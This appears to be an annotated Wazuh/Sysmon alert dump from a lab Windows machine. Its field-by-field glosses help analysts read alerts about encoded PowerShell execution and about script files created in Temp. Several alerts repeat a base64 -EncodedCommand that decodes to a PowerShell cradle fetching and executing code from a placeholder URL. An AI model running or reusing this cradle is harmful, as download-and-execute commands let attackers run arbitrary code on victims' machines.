data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 10 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534207.845605 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:34:43.1695516Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 281372 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:34:42.701
ProcessGuid: {94294ddc-bc82-680a-730a-000000000e00}
ProcessId: 14400
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bc80-680a-710a-000000000e00}
ParentProcessId: 12900
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:34:42.701 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bc82-680a-730a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14400 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bc80-680a-710a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 12900 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 12 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534208.853675 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:15.5626418Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 281711 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:15.537
ProcessGuid: {94294ddc-bca2-680a-8c0a-000000000e00}
ProcessId: 8152
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_rwqywtk0.t2z.ps1
CreationUtcTime: 2025-04-24 22:35:15.537
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:15.537 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bca2-680a-8c0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8152 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_rwqywtk0.t2z.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:15.537 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 11 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534208.856439 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:19.7921118Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 281758 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:18.662
ProcessGuid: {94294ddc-bca6-680a-900a-000000000e00}
ProcessId: 13940
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bca4-680a-8e0a-000000000e00}
ParentProcessId: 13604
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:18.662 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bca6-680a-900a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13940 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bca4-680a-8e0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13604 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 13 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534208.864509 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:20.0085076Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 281759 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:19.991
ProcessGuid: {94294ddc-bca6-680a-900a-000000000e00}
ProcessId: 13940
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_if1icrzi.oi2.ps1
CreationUtcTime: 2025-04-24 22:35:19.989
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:19.991 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bca6-680a-900a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13940 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_if1icrzi.oi2.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:19.989 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 14 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534208.867277 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:25.2990647Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 281809 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:25.289
ProcessGuid: {94294ddc-bcac-680a-950a-000000000e00}
ProcessId: 10760
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_umgehqh1.lii.ps1
CreationUtcTime: 2025-04-24 22:35:25.289
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:25.289 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
